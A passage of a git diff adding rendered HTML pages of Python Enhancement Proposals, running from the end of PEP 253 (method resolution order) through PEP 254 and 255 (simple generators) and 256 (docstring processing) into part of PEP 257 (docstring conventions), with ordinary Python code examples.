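        order.extend(classic_order(base))
    return order

def new_mro(cls):
    # Keep only the last occurrence of each class in the classic order.
    order = classic_order(cls)
    result = []
    for i in range(len(order)):
        if order[i] not in order[i + 1:]:
            result.append(order[i])
    return result

For the ABCD diamond above, new_mro(D) yields [D, B, C, A].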

Searching for methods in this order will do the right thing for +the diamond diagram. Because of the way the list is constructed, +it does not change the search order in situations where no diamond +is involved.

+

Isn’t this backwards incompatible? Won’t it break existing code? +It would, if we changed the method resolution order for all +classes. However, in Python 2.2, the new lookup rule will only be +applied to types derived from built-in types, which is a new +feature. Class statements without a base class create “classic +classes”, and so do class statements whose base classes are +themselves classic classes. For classic classes the classic +lookup rule will be used. (To experiment with the new lookup rule +for classic classes, you will be able to specify a different +metaclass explicitly.) We’ll also provide a tool that analyzes a +class hierarchy looking for methods that would be affected by a +change in method resolution order.

+

XXX Another way to explain the motivation for the new MRO, due to +Damian Conway: you never use the method defined in a base class if +it is defined in a derived class that you haven’t explored yet +(using the old search order).

+
+
+

XXX To be done

+

Additional topics to be discussed in this PEP:

+
    +
  • backwards compatibility issues!!!
  • +
  • class methods and static methods
  • +
  • cooperative methods and super()
  • +
  • mapping between type object slots (tp_foo) and special methods +(__foo__) (actually, this may belong in PEP 252)
  • +
  • built-in names for built-in types (object, int, str, list etc.)
  • +
  • __dict__ and __dictoffset__
  • +
  • __slots__
  • +
  • the HEAPTYPE flag bit
  • +
  • GC support
  • +
  • API docs for all the new functions
  • +
  • how to use __new__
  • +
  • writing metaclasses (using mro() etc.)
  • +
  • high level user overview
  • +
+
+

open issues

+
    +
  • do we need __del__?
  • +
  • assignment to __dict__, __bases__
  • +
  • inconsistent naming +(e.g. tp_dealloc/tp_new/tp_init/tp_alloc/tp_free)
  • +
  • add builtin alias ‘dict’ for ‘dictionary’?
  • +
  • when subclasses of dict/list etc. are passed to system +functions, the __getitem__ overrides (etc.) aren’t always +used
  • +
+
+
+
+

Implementation

+

A prototype implementation of this PEP (and for PEP 252) is +available from CVS, and in the series of Python 2.2 alpha and beta +releases. For some examples of the features described here, see +the file Lib/test/test_descr.py and the extension module +Modules/xxsubtype.c.

+
+
+

References

[1] “Putting Metaclasses to Work: A New Dimension in Object-Oriented Programming”, Ira R. Forman and Scott H. Danforth, Addison-Wesley, 1999.
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0253.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file
diff --git a/pep-0254/index.html b/pep-0254/index.html
new file mode 100644
index 00000000000..03278a3be40
--- /dev/null
+++ b/pep-0254/index.html
@@ -0,0 +1,143 @@
PEP 254 – Making Classes Look More Like Types | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 254 – Making Classes Look More Like Types

+
+
Author:
+
Guido van Rossum <guido at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
18-Jun-2001
+
Python-Version:
+
2.2
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP has not been written yet. Watch this space!

+
+
+

Status

+

This PEP was a stub entry and was eventually abandoned without having been filled out. Most of the intended functionality was implemented in Python 2.2 with new-style types and classes.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0254.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file
diff --git a/pep-0255/index.html b/pep-0255/index.html
new file mode 100644
index 00000000000..f9ab2cb2959
--- /dev/null
+++ b/pep-0255/index.html
@@ -0,0 +1,630 @@
PEP 255 – Simple Generators | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 255 – Simple Generators

+
+
Author:
+
Neil Schemenauer <nas at arctrix.com>, +Tim Peters <tim.peters at gmail.com>, +Magnus Lie Hetland <magnus at hetland.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Requires:
+
234
+
Created:
+
18-May-2001
+
Python-Version:
+
2.2
+
Post-History:
+
14-Jun-2001, 23-Jun-2001
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP introduces the concept of generators to Python, as well as a new +statement used in conjunction with them, the yield statement.

+
+
+

Motivation

+

When a producer function has a hard enough job that it requires maintaining +state between values produced, most programming languages offer no pleasant and +efficient solution beyond adding a callback function to the producer’s argument +list, to be called with each value produced.

+

For example, tokenize.py in the standard library takes this approach: the +caller must pass a tokeneater function to tokenize(), called whenever +tokenize() finds the next token. This allows tokenize to be coded in a +natural way, but programs calling tokenize are typically convoluted by the need +to remember between callbacks which token(s) were seen last. The tokeneater +function in tabnanny.py is a good example of that, maintaining a state +machine in global variables, to remember across callbacks what it has already +seen and what it hopes to see next. This was difficult to get working +correctly, and is still difficult for people to understand. Unfortunately, +that’s typical of this approach.

+

An alternative would have been for tokenize to produce an entire parse of the +Python program at once, in a large list. Then tokenize clients could be +written in a natural way, using local variables and local control flow (such as +loops and nested if statements) to keep track of their state. But this isn’t +practical: programs can be very large, so no a priori bound can be placed on +the memory needed to materialize the whole parse; and some tokenize clients +only want to see whether something specific appears early in the program (e.g., +a future statement, or, as is done in IDLE, just the first indented statement), +and then parsing the whole program first is a severe waste of time.

+

Another alternative would be to make tokenize an iterator, +delivering the +next token whenever its .next() method is invoked. This is pleasant for the +caller in the same way a large list of results would be, but without the memory +and “what if I want to get out early?” drawbacks. However, this shifts the +burden on tokenize to remember its state between .next() invocations, and +the reader need only glance at tokenize.tokenize_loop() to realize what a +horrid chore that would be. Or picture a recursive algorithm for producing the +nodes of a general tree structure: to cast that into an iterator framework +requires removing the recursion manually and maintaining the state of the +traversal by hand.

+

A fourth option is to run the producer and consumer in separate threads. This +allows both to maintain their states in natural ways, and so is pleasant for +both. Indeed, Demo/threads/Generator.py in the Python source distribution +provides a usable synchronized-communication class for doing that in a general +way. This doesn’t work on platforms without threads, though, and is very slow +on platforms that do (compared to what is achievable without threads).

+

A final option is to use the Stackless [1] (PEP 219) variant implementation of Python +instead, which supports lightweight coroutines. This has much the same +programmatic benefits as the thread option, but is much more efficient. +However, Stackless is a controversial rethinking of the Python core, and it may +not be possible for Jython to implement the same semantics. This PEP isn’t the +place to debate that, so suffice it to say here that generators provide a +useful subset of Stackless functionality in a way that fits easily into the +current CPython implementation, and is believed to be relatively +straightforward for other Python implementations.

+

That exhausts the current alternatives. Some other high-level languages +provide pleasant solutions, notably iterators in Sather [2], which were +inspired by iterators in CLU; and generators in Icon [3], a novel language +where every expression is a generator. There are differences among these, +but the basic idea is the same: provide a kind of function that can return an +intermediate result (“the next value”) to its caller, but maintaining the +function’s local state so that the function can be resumed again right where it +left off. A very simple example:

+
def fib():
+    a, b = 0, 1
+    while 1:
+       yield b
+       a, b = b, a+b
+
+
+

When fib() is first invoked, it sets a to 0 and b to 1, then yields b +back to its caller. The caller sees 1. When fib is resumed, from its +point of view the yield statement is really the same as, say, a print +statement: fib continues after the yield with all local state intact. a +and b then become 1 and 1, and fib loops back to the yield, yielding +1 to its invoker. And so on. From fib’s point of view it’s just +delivering a sequence of results, as if via callback. But from its caller’s +point of view, the fib invocation is an iterable object that can be resumed +at will. As in the thread approach, this allows both sides to be coded in the +most natural ways; but unlike the thread approach, this can be done efficiently +and on all platforms. Indeed, resuming a generator should be no more expensive +than a function call.

+
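Driving fib() by hand shows the caller's view (a sketch using the .next() protocol specified below):

g = fib()
for i in range(6):
    print g.next(),   # prints: 1 1 2 3 5 8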

The same kind of approach applies to many producer/consumer functions. For +example, tokenize.py could yield the next token instead of invoking a +callback function with it as argument, and tokenize clients could iterate over +the tokens in a natural way: a Python generator is a kind of Python +iterator, but of an especially powerful kind.

+
+
+

Specification: Yield

+

A new statement is introduced:

+
yield_stmt:    "yield" expression_list
+
+
+

yield is a new keyword, so a future statement (PEP 236) is needed to phase +this in: in the initial release, a module desiring to use generators must +include the line:

+
from __future__ import generators
+
+
+

near the top (see PEP 236 for details). Modules using the identifier yield without a future statement will trigger warnings. In the following release, yield will be a language keyword and the future statement will no longer be needed.

+

The yield statement may only be used inside functions. A function that +contains a yield statement is called a generator function. A generator +function is an ordinary function object in all respects, but has the new +CO_GENERATOR flag set in the code object’s co_flags member.

+

When a generator function is called, the actual arguments are bound to +function-local formal argument names in the usual way, but no code in the body +of the function is executed. Instead a generator-iterator object is returned; +this conforms to the iterator protocol, so in particular can be used in +for-loops in a natural way. Note that when the intent is clear from context, +the unqualified name “generator” may be used to refer either to a +generator-function or a generator-iterator.

+
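A sketch of this laziness:

def gen():
    print "started"   # not executed until the first .next() call
    yield 1

g = gen()             # returns a generator-iterator; prints nothing yet
print g.next()        # prints "started", then 1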

Each time the .next() method of a generator-iterator is invoked, the code +in the body of the generator-function is executed until a yield or +return statement (see below) is encountered, or until the end of the body +is reached.

+

If a yield statement is encountered, the state of the function is frozen, +and the value of expression_list is returned to .next()’s caller. By +“frozen” we mean that all local state is retained, including the current +bindings of local variables, the instruction pointer, and the internal +evaluation stack: enough information is saved so that the next time +.next() is invoked, the function can proceed exactly as if the yield +statement were just another external call.

+

Restriction: A yield statement is not allowed in the try clause of a +try/finally construct. The difficulty is that there’s no guarantee the +generator will ever be resumed, hence no guarantee that the finally block will +ever get executed; that’s too much a violation of finally’s purpose to bear.

+

Restriction: A generator cannot be resumed while it is actively running:

+
>>> def g():
+...     i = me.next()
+...     yield i
+>>> me = g()
+>>> me.next()
+Traceback (most recent call last):
+ ...
+ File "<string>", line 2, in g
+ValueError: generator already executing
+
+
+
+
+

Specification: Return

+

A generator function can also contain return statements of the form:

+
return
+
+
+

Note that an expression_list is not allowed on return statements in the body +of a generator (although, of course, they may appear in the bodies of +non-generator functions nested within the generator).

+

When a return statement is encountered, control proceeds as in any function +return, executing the appropriate finally clauses (if any exist). Then a +StopIteration exception is raised, signalling that the iterator is +exhausted. A StopIteration exception is also raised if control flows off +the end of the generator without an explicit return.

+

Note that return means “I’m done, and have nothing interesting to return”, for +both generator functions and non-generator functions.

+

Note that return isn’t always equivalent to raising StopIteration: the difference lies in how enclosing try/except constructs are treated. For example:

+
>>> def f1():
+...     try:
+...         return
+...     except:
+...        yield 1
+>>> print list(f1())
+[]
+
+
+

because, as in any function, return simply exits, but:

+
>>> def f2():
+...     try:
+...         raise StopIteration
+...     except:
+...         yield 42
+>>> print list(f2())
+[42]
+
+
+

because StopIteration is captured by a bare except, as is any +exception.

+
+
+

Specification: Generators and Exception Propagation

+

If an unhandled exception (including, but not limited to, StopIteration) is raised by, or passes through, a generator function, then the exception is passed on to the caller in the usual way, and subsequent attempts to resume the generator function raise StopIteration. In other words, an unhandled exception terminates a generator’s useful life.

+

Example (not idiomatic but to illustrate the point):

+
>>> def f():
+...     return 1/0
+>>> def g():
+...     yield f()  # the zero division exception propagates
+...     yield 42   # and we'll never get here
+>>> k = g()
+>>> k.next()
+Traceback (most recent call last):
+  File "<stdin>", line 1, in ?
+  File "<stdin>", line 2, in g
+  File "<stdin>", line 2, in f
+ZeroDivisionError: integer division or modulo by zero
+>>> k.next()  # and the generator cannot be resumed
+Traceback (most recent call last):
+  File "<stdin>", line 1, in ?
+StopIteration
+>>>
+
+
+
+
+

Specification: Try/Except/Finally

+

As noted earlier, yield is not allowed in the try clause of a +try/finally construct. A consequence is that generators should allocate +critical resources with great care. There is no restriction on yield +otherwise appearing in finally clauses, except clauses, or in the +try clause of a try/except construct:

+
>>> def f():
+...     try:
+...         yield 1
+...         try:
+...             yield 2
+...             1/0
+...             yield 3  # never get here
+...         except ZeroDivisionError:
+...             yield 4
+...             yield 5
+...             raise
+...         except:
+...             yield 6
+...         yield 7     # the "raise" above stops this
+...     except:
+...         yield 8
+...     yield 9
+...     try:
+...         x = 12
+...     finally:
+...        yield 10
+...     yield 11
+>>> print list(f())
+[1, 2, 4, 5, 8, 9, 10, 11]
+>>>
+
+
+
+
+

Example

+
# A binary tree class.
+class Tree:
+
+    def __init__(self, label, left=None, right=None):
+        self.label = label
+        self.left = left
+        self.right = right
+
+    def __repr__(self, level=0, indent="    "):
+        s = level*indent + `self.label`
+        if self.left:
+            s = s + "\n" + self.left.__repr__(level+1, indent)
+        if self.right:
+            s = s + "\n" + self.right.__repr__(level+1, indent)
+        return s
+
+    def __iter__(self):
+        return inorder(self)
+
+# Create a Tree from a list.
+def tree(list):
+    n = len(list)
+    if n == 0:
+        return []
+    i = n / 2
+    return Tree(list[i], tree(list[:i]), tree(list[i+1:]))
+
+# A recursive generator that generates Tree labels in in-order.
+def inorder(t):
+    if t:
+        for x in inorder(t.left):
+            yield x
+        yield t.label
+        for x in inorder(t.right):
+            yield x
+
+# Show it off: create a tree.
+t = tree("ABCDEFGHIJKLMNOPQRSTUVWXYZ")
+# Print the nodes of the tree in in-order.
+for x in t:
+    print x,
+print
+
+# A non-recursive generator.
+def inorder(node):
+    stack = []
+    while node:
+        while node.left:
+            stack.append(node)
+            node = node.left
+        yield node.label
+        while not node.right:
+            try:
+                node = stack.pop()
+            except IndexError:
+                return
+            yield node.label
+        node = node.right
+
+# Exercise the non-recursive generator.
+for x in t:
+    print x,
+print
+
+
+

Both output blocks display:

+
A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
+
+
+
+
+

Q & A

+
+

Why not a new keyword instead of reusing def?

+

See BDFL Pronouncements section below.

+
+
+

Why a new keyword for yield? Why not a builtin function instead?

+

Control flow is much better expressed via keyword in Python, and yield is a +control construct. It’s also believed that efficient implementation in Jython +requires that the compiler be able to determine potential suspension points at +compile-time, and a new keyword makes that easy. The CPython reference +implementation also exploits it heavily, to detect which functions are +generator-functions (although a new keyword in place of def would solve +that for CPython – but people asking the “why a new keyword?” question don’t +want any new keyword).

+
+
+

Then why not some other special syntax without a new keyword?

+

For example, one of these instead of yield 3:

+
return 3 and continue
+return and continue 3
+return generating 3
+continue return 3
+return >> , 3
+from generator return 3
+return >> 3
+return << 3
+>> 3
+<< 3
+* 3
+
+
+

Did I miss one <wink>? Out of hundreds of messages, I counted three +suggesting such an alternative, and extracted the above from them. It would be +nice not to need a new keyword, but nicer to make yield very clear – I +don’t want to have to deduce that a yield is occurring from making sense of a +previously senseless sequence of keywords or operators. Still, if this +attracts enough interest, proponents should settle on a single consensus +suggestion, and Guido will Pronounce on it.

+
+
+

Why allow return at all? Why not force termination to be spelled raise StopIteration?

+

The mechanics of StopIteration are low-level details, much like the mechanics of IndexError in Python 2.1: the implementation needs to do something well-defined under the covers, and Python exposes these mechanisms for advanced users. That’s not an argument for forcing everyone to work at that level, though. return means “I’m done” in any kind of function, and that’s easy to explain and to use. Note that return isn’t always equivalent to raise StopIteration within a try/except construct, either (see the “Specification: Return” section).

+
+
+

Then why not allow an expression on return too?

+

Perhaps we will someday. In Icon, return expr means both “I’m done”, and +“but I have one final useful value to return too, and this is it”. At the +start, and in the absence of compelling uses for return expr, it’s simply +cleaner to use yield exclusively for delivering values.

+
+
+
+

BDFL Pronouncements

+
+

Issue

+

Introduce another new keyword (say, gen or generator) in place +of def, or otherwise alter the syntax, to distinguish generator-functions +from non-generator functions.

+
+
+

Con

+

In practice (how you think about them), generators are functions, but +with the twist that they’re resumable. The mechanics of how they’re set up +is a comparatively minor technical issue, and introducing a new keyword would +unhelpfully overemphasize the mechanics of how generators get started (a vital +but tiny part of a generator’s life).

+
+
+

Pro

+

In reality (how you think about them), generator-functions are actually +factory functions that produce generator-iterators as if by magic. In this +respect they’re radically different from non-generator functions, acting more +like a constructor than a function, so reusing def is at best confusing. +A yield statement buried in the body is not enough warning that the +semantics are so different.

+
+
+

BDFL

+

def it stays. No argument on either side is totally convincing, so I +have consulted my language designer’s intuition. It tells me that the syntax +proposed in the PEP is exactly right - not too hot, not too cold. But, like +the Oracle at Delphi in Greek mythology, it doesn’t tell me why, so I don’t +have a rebuttal for the arguments against the PEP syntax. The best I can come +up with (apart from agreeing with the rebuttals … already made) is “FUD”. +If this had been part of the language from day one, I very much doubt it would +have made Andrew Kuchling’s “Python Warts” page.

+
+
+
+

Reference Implementation

+

The current implementation, in a preliminary state (no docs, but well tested +and solid), is part of Python’s CVS development tree [5]. Using this requires +that you build Python from source.

+

This was derived from an earlier patch by Neil Schemenauer [4].

+
+
+

Footnotes and References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0255.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file
diff --git a/pep-0256/index.html b/pep-0256/index.html
new file mode 100644
index 00000000000..4bfafc00d23
--- /dev/null
+++ b/pep-0256/index.html
@@ -0,0 +1,334 @@
PEP 256 – Docstring Processing System Framework | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 256 – Docstring Processing System Framework

+
+
Author:
+
David Goodger <goodger at python.org>
+
Discussions-To:
+
Doc-SIG list
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
01-Jun-2001
+
Post-History:
+
13-Jun-2001
+
+
+
+
Table of Contents +
+
+

Rejection Notice

+

This proposal seems to have run out of steam.

+
+
+

Abstract

+

Python lends itself to inline documentation. With its built-in +docstring syntax, a limited form of Literate Programming is easy to +do in Python. However, there are no satisfactory standard tools for +extracting and processing Python docstrings. The lack of a standard +toolset is a significant gap in Python’s infrastructure; this PEP aims +to fill the gap.

+

The issues surrounding docstring processing have been contentious and +difficult to resolve. This PEP proposes a generic Docstring +Processing System (DPS) framework, which separates out the components +(program and conceptual), enabling the resolution of individual issues +either through consensus (one solution) or through divergence (many). +It promotes standard interfaces which will allow a variety of plug-in +components (input context readers, markup parsers, and output format +writers) to be used.

+

The concepts of a DPS framework are presented independently of +implementation details.

+
+
+

Road Map to the Docstring PEPs

+

There are many aspects to docstring processing. The “Docstring PEPs” +have broken up the issues in order to deal with each of them in +isolation, or as close as possible. The individual aspects and +associated PEPs are as follows:

+
    +
  • Docstring syntax. PEP 287, “reStructuredText Docstring Format”, +proposes a syntax for Python docstrings, PEPs, and +other uses.
  • +
  • Docstring semantics consist of at least two aspects:
      +
    • Conventions: the high-level structure of docstrings. Dealt with +in PEP 257, “Docstring Conventions”.
    • +
    • Methodology: rules for the informational content of docstrings. +Not addressed.
    • +
    +
  • +
  • Processing mechanisms. This PEP (PEP 256) outlines the high-level +issues and specification of an abstract docstring processing system +(DPS). PEP 258, “Docutils Design Specification”, is an +overview of the design and implementation of one DPS under +development.
  • +
  • Output styles: developers want the documentation generated from +their source code to look good, and there are many different ideas +about what that means. PEP 258 touches on “Stylist Transforms”. +This aspect of docstring processing has yet to be fully explored.
  • +
+

By separating out the issues, we can form consensus more easily +(smaller fights ;-), and accept divergence more readily.

+
+
+

Rationale

+

There are standard inline documentation systems for some other +languages. For example, Perl has POD (“Plain Old Documentation”) and +Java has Javadoc, but neither of these mesh with the Pythonic way. +POD syntax is very explicit, but takes after Perl in terms of +readability. Javadoc is HTML-centric; except for “@field” tags, +raw HTML is used for markup. There are also general tools such as +Autoduck and Web (Tangle & Weave), useful for multiple languages.

+

There have been many attempts to write auto-documentation systems +for Python (not an exhaustive list):

+
    +
  • Marc-Andre Lemburg’s doc.py
  • +
  • Daniel Larsson’s pythondoc & gendoc
  • +
  • Doug Hellmann’s HappyDoc
  • +
  • Laurence Tratt’s Crystal (no longer available on the web)
  • +
  • Ka-Ping Yee’s pydoc (pydoc.py is now part of the Python standard +library; see below)
  • +
  • Tony Ibbs’ docutils (Tony has donated this name to the Docutils +project)
  • +
  • Edward Loper’s STminus formalization and related efforts
  • +
+

These systems, each with different goals, have had varying degrees of +success. A problem with many of the above systems was over-ambition +combined with inflexibility. They provided a self-contained set of +components: a docstring extraction system, a markup parser, an +internal processing system and one or more output format writers with +a fixed style. Inevitably, one or more aspects of each system had +serious shortcomings, and they were not easily extended or modified, +preventing them from being adopted as standard tools.

+

It has become clear (to this author, at least) that the “all or +nothing” approach cannot succeed, since no monolithic self-contained +system could possibly be agreed upon by all interested parties. A +modular component approach designed for extension, where components +may be multiply implemented, may be the only chance for success. +Standard inter-component APIs will make the DPS components +comprehensible without requiring detailed knowledge of the whole, +lowering the barrier for contributions, and ultimately resulting in a +rich and varied system.

+

Each of the components of a docstring processing system should be developed independently. A “best of breed” system should be chosen, merged from existing systems and/or developed anew. This system should be included in Python’s standard library.

+
+

PyDoc & Other Existing Systems

+

PyDoc became part of the Python standard library as of release 2.1. +It extracts and displays docstrings from within the Python interactive +interpreter, from the shell command line, and from a GUI window into a +web browser (HTML). Although a very useful tool, PyDoc has several +deficiencies, including:

+
    +
  • In the case of the GUI/HTML, except for some heuristic hyperlinking +of identifier names, no formatting of the docstrings is done. They +are presented within <p><small><tt> tags to avoid unwanted line +wrapping. Unfortunately, the result is not attractive.
  • +
  • PyDoc extracts docstrings and structural information (class +identifiers, method signatures, etc.) from imported module objects. +There are security issues involved with importing untrusted code. +Also, information from the source is lost when importing, such as +comments, “additional docstrings” (string literals in non-docstring +contexts; see PEP 258), and the order of definitions.
  • +
+

The functionality proposed in this PEP could be added to or used by +PyDoc when serving HTML pages. The proposed docstring processing +system’s functionality is much more than PyDoc needs in its current +form. Either an independent tool will be developed (which PyDoc may +or may not use), or PyDoc could be expanded to encompass this +functionality and become the docstring processing system (or one +such system). That decision is beyond the scope of this PEP.

+

Similarly for other existing docstring processing systems, their +authors may or may not choose compatibility with this framework. +However, if this framework is accepted and adopted as the Python +standard, compatibility will become an important consideration in +these systems’ future.

+
+
+
+

Specification

+

The docstring processing system framework is broken up as follows:

+
    +
  1. Docstring conventions. Documents issues such as:
      +
    • What should be documented where.
    • +
    • First line is a one-line synopsis.
    • +
    +

    PEP 257 documents some of these issues.

    +
  2. +
  3. Docstring processing system design specification. Documents +issues such as:
      +
    • High-level spec: what a DPS does.
    • +
    • Command-line interface for executable script.
    • +
    • System Python API.
    • +
    • Docstring extraction rules.
    • +
    • Readers, which encapsulate the input context.
    • +
    • Parsers.
    • +
    • Document tree: the intermediate internal data structure. The +output of the Parser and Reader, and the input to the Writer all +share the same data structure.
    • +
    • Transforms, which modify the document tree.
    • +
    • Writers for output formats.
    • +
    • Distributors, which handle output management (one file, many +files, or objects in memory).
    • +
    +

    These issues are applicable to any docstring processing system +implementation. PEP 258 documents these issues.

    +
  4. +
  5. Docstring processing system implementation.
  6. +
  4. Input markup specifications: docstring syntax. PEP 287 +proposes a standard syntax.
  8. +
  5. Input parser implementations.
  10. +
  6. Input context readers (“modes”: Python source code, PEP, standalone +text file, email, etc.) and implementations.
  12. +
  7. Stylists: certain input context readers may have associated +stylists which allow for a variety of output document styles.
  14. +
  8. Output formats (HTML, XML, TeX, DocBook, info, etc.) and writer +implementations.
  16. +
+

Components 1, 2/3/5, and 4 are the subject of individual companion +PEPs. If there is another implementation of the framework or +syntax/parser, additional PEPs may be required. Multiple +implementations of each of components 6 and 7 will be required; the +PEP mechanism may be overkill for these components.

+
+
+

Project Web Site

+

A SourceForge project has been set up for this work at +http://docutils.sourceforge.net/.

+
+ +
+

Acknowledgements

+

This document borrows ideas from the archives of the Python +Doc-SIG. Thanks to all members past & present.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0256.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0257/index.html b/pep-0257/index.html
new file mode 100644
index 00000000000..8b04e3fed25
--- /dev/null
+++ b/pep-0257/index.html
@@ -0,0 +1,388 @@
PEP 257 – Docstring Conventions | peps.python.org
+
+


+ + +
+
+
+

PEP 257 – Docstring Conventions

+
+
Author:
+
David Goodger <goodger at python.org>, +Guido van Rossum <guido at python.org>
+
Discussions-To:
+
Doc-SIG list
+
Status:
+
Active
+
Type:
+
Informational
+
Created:
+
29-May-2001
+
Post-History:
+
13-Jun-2001
+
+
+
+
+
+

Abstract

+

This PEP documents the semantics and conventions associated with +Python docstrings.

+
+
+

Rationale

+

The aim of this PEP is to standardize the high-level structure of +docstrings: what they should contain, and how to say it (without +touching on any markup syntax within docstrings). The PEP contains +conventions, not laws or syntax.

+
+
“A universal convention supplies all of maintainability, clarity, +consistency, and a foundation for good programming habits too. +What it doesn’t do is insist that you follow it against your will. +That’s Python!”

—Tim Peters on comp.lang.python, 2001-06-16

+
+

If you violate these conventions, the worst you’ll get is some dirty +looks. But some software (such as the Docutils docstring processing +system PEP 256, PEP 258) will be aware of the conventions, so following them +will get you the best results.

+
+
+

Specification

+
+

What is a Docstring?

+

A docstring is a string literal that occurs as the first statement in +a module, function, class, or method definition. Such a docstring +becomes the __doc__ special attribute of that object.

+

All modules should normally have docstrings, and all functions and +classes exported by a module should also have docstrings. Public +methods (including the __init__ constructor) should also have +docstrings. A package may be documented in the module docstring of +the __init__.py file in the package directory.

+

String literals occurring elsewhere in Python code may also act as +documentation. They are not recognized by the Python bytecode +compiler and are not accessible as runtime object attributes (i.e. not +assigned to __doc__), but two types of extra docstrings may be +extracted by software tools:

+
    +
  1. String literals occurring immediately after a simple assignment at +the top level of a module, class, or __init__ method are called +“attribute docstrings”.
  2. +
  2. String literals occurring immediately after another docstring are +called “additional docstrings”.
  4. +
+

Please see PEP 258, “Docutils Design Specification”, for a +detailed description of attribute and additional docstrings.

+

For consistency, always use """triple double quotes""" around +docstrings. Use r"""raw triple double quotes""" if you use any +backslashes in your docstrings.

+

There are two forms of docstrings: one-liners and multi-line +docstrings.

+
+
+

One-line Docstrings

+

One-liners are for really obvious cases. They should really fit on +one line. For example:

+
def kos_root():
+    """Return the pathname of the KOS root directory."""
+    global _kos_root
+    if _kos_root: return _kos_root
+    ...
+
+
+

Notes:

+
    +
  • Triple quotes are used even though the string fits on one line. +This makes it easy to later expand it.
  • +
  • The closing quotes are on the same line as the opening quotes. This +looks better for one-liners.
  • +
  • There’s no blank line either before or after the docstring.
  • +
  • The docstring is a phrase ending in a period. It prescribes the +function or method’s effect as a command (“Do this”, “Return that”), +not as a description; e.g. don’t write “Returns the pathname …”.
  • +
  • The one-line docstring should NOT be a “signature” reiterating the +function/method parameters (which can be obtained by introspection). +Don’t do:
    def function(a, b):
    +    """function(a, b) -> list"""
    +
    +
    +

    This type of docstring is only appropriate for C functions (such as +built-ins), where introspection is not possible. However, the +nature of the return value cannot be determined by introspection, +so it should be mentioned. The preferred form for such a docstring +would be something like:

    +
    def function(a, b):
    +    """Do X and return a list."""
    +
    +
    +

    (Of course “Do X” should be replaced by a useful description!)

    +
  • +
+
+
+

Multi-line Docstrings

+

Multi-line docstrings consist of a summary line just like a one-line +docstring, followed by a blank line, followed by a more elaborate +description. The summary line may be used by automatic indexing +tools; it is important that it fits on one line and is separated from +the rest of the docstring by a blank line. The summary line may be on +the same line as the opening quotes or on the next line. The entire +docstring is indented the same as the quotes at its first line (see +example below).

+

Insert a blank line after all docstrings (one-line or multi-line) that +document a class – generally speaking, the class’s methods are +separated from each other by a single blank line, and the docstring +needs to be offset from the first method by a blank line.

+
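A minimal sketch of that layout (the class and method names are hypothetical):

class Greeter:
    """Hypothetical example: greet people politely."""

    def greet(self, name):
        """Return a greeting for name."""
        return 'Hello, ' + name

The blank line after the class docstring keeps it offset from the first method, matching the blank lines used between methods.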

The docstring of a script (a stand-alone program) should be usable as +its “usage” message, printed when the script is invoked with incorrect +or missing arguments (or perhaps with a “-h” option, for “help”). +Such a docstring should document the script’s function and command +line syntax, environment variables, and files. Usage messages can be +fairly elaborate (several screens full) and should be sufficient for a +new user to use the command properly, as well as a complete quick +reference to all options and arguments for the sophisticated user.

+

The docstring for a module should generally list the classes, +exceptions and functions (and any other objects) that are exported by +the module, with a one-line summary of each. (These summaries +generally give less detail than the summary line in the object’s +docstring.) The docstring for a package (i.e., the docstring of the +package’s __init__.py module) should also list the modules and +subpackages exported by the package.

+
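A module docstring following this convention might look like the sketch below (all names are hypothetical):

"""Spam-handling utilities.

Exported classes:

Can -- a container for spam

Exported functions:

fry() -- fry a slice of spam
open_can() -- open a Can and return its contents
"""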

The docstring for a function or method should summarize its behavior +and document its arguments, return value(s), side effects, exceptions +raised, and restrictions on when it can be called (all if applicable). +Optional arguments should be indicated. It should be documented +whether keyword arguments are part of the interface.

+

The docstring for a class should summarize its behavior and list the +public methods and instance variables. If the class is intended to be +subclassed, and has an additional interface for subclasses, this +interface should be listed separately (in the docstring). The class +constructor should be documented in the docstring for its __init__ +method. Individual methods should be documented by their own +docstring.

+

If a class subclasses another class and its behavior is mostly +inherited from that class, its docstring should mention this and +summarize the differences. Use the verb “override” to indicate that a +subclass method replaces a superclass method and does not call the +superclass method; use the verb “extend” to indicate that a subclass +method calls the superclass method (in addition to its own behavior).

+

Do not use the Emacs convention of mentioning the arguments of +functions or methods in upper case in running text. Python is case +sensitive and the argument names can be used for keyword arguments, so +the docstring should document the correct argument names. It is best +to list each argument on a separate line. For example:

+
def complex(real=0.0, imag=0.0):
+    """Form a complex number.
+
+    Keyword arguments:
+    real -- the real part (default 0.0)
+    imag -- the imaginary part (default 0.0)
+    """
+    if imag == 0.0 and real == 0.0:
+        return complex_zero
+    ...
+
+
+

Unless the entire docstring fits on a line, place the closing quotes +on a line by themselves. This way, Emacs’ fill-paragraph command +can be used on it.

+
+
+

Handling Docstring Indentation

+

Docstring processing tools will strip a uniform amount of indentation +from the second and further lines of the docstring, equal to the +minimum indentation of all non-blank lines after the first line. Any +indentation in the first line of the docstring (i.e., up to the first +newline) is insignificant and removed. Relative indentation of later +lines in the docstring is retained. Blank lines should be removed +from the beginning and end of the docstring.

+

Since code is much more precise than words, here is an implementation +of the algorithm:

+
import sys

def trim(docstring):
+    if not docstring:
+        return ''
+    # Convert tabs to spaces (following the normal Python rules)
+    # and split into a list of lines:
+    lines = docstring.expandtabs().splitlines()
+    # Determine minimum indentation (first line doesn't count):
+    indent = sys.maxsize
+    for line in lines[1:]:
+        stripped = line.lstrip()
+        if stripped:
+            indent = min(indent, len(line) - len(stripped))
